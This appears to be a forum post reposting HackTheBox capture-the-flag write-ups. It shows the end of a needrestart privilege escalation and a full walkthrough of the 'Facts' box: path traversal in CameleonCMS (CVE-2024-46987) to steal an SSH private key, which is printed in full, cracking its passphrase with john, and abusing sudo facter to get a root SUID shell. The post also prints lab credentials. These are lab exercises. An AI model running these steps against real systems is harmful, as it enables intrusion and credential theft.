Terminal 2 (victim - ssh #1):
bash exploit.sh

Terminal 3 (victim - ssh #2):
sudo /usr/sbin/needrestart

expl.py script detects SUID shell creation and executes it automatically

whoami
# root

cat /root/root.txt

Credentials summary (4 noob)
-------------------
fismathack:Keepmesafeandwarm (SSH)

---

reuploadin my old writeups not available on breachforums here, if a box already has a writeup i dont reupload, like the seasonal room pterodactyl

[Season10] USER Pterodactyl

Sun, 08 Feb 2026 10:22:41 +0800

Hidden Content

You must register or login to view this content.

[Season10] ROOT Pterodactyl

Sun, 08 Feb 2026 07:07:30 +0800

Hidden Content

You must register or login to view this content.

HTB - FACTS.HTB - EASY LINUX

Thu, 05 Feb 2026 16:36:37 +0800

FACTS - HACKTHEBOX
LINUX - EASY
IP: 10.129.69.95 (ull have a different ip)

users
-----
william
trivia

recon
-----
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95 (ctf only)

22/OpenSSH 9.9p1
80/nginx 1.26.3
- path traversal on CameleonCMS 2.9.0 CVE-2024-46987 (base vuln version 2.8.0 but works on 2.9.0)
54321/http

exploit
------------

grabbed /home/trivia/.ssh/id_ed25519 via path traversal:
http://facts.htb/admin/media/download_pr...id_ed25519 (remplate , by . for the path, BF block me)

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCd4lFW9D
oZ28sQDBe+ZIltAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAILNlyBF4wULHGQax
bUqV/3L712nR8jkzuG2DHrCPy9r/AAAAoILU2uUq5EuFWxb49m7/O1r+jOXkqJFPDFW3Sx
64HaSutBpMBTpNIWf6RviD/iEjRXHM7dKr6LBzu6PiZ3iA82tlbhAKqfZ9WvWYINhYxiQL
G3jKAVqOn5q6D7s5NSxOe6mOW1d5fshHZXKBqqU3WOt9Wvh9/yCZovIhIRK7/GcXCZdTVY
1Mce3bg0ERwrOixPG5d0SvnvdSLvIzcvaI/+w=
-----END OPENSSH PRIVATE KEY-----

bruteforced the passphrase:
ssh2john id_ed25519 > hash.txt
john --wordlist=rockyou.txt hash.txt
password: dragonballz

ssh login as trivia:
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)

privesc
-------
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash

mkdir -p /tmp/.exploit/facter

in /tmp/.exploit/facter/root.rb add this code: (sorry breachforum blocks me when i wanna write the code directly on the writeup, so heres a pastebin)

https://pastebin.com/Pd4vBWHZ

sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter
/bin/bash -p

got root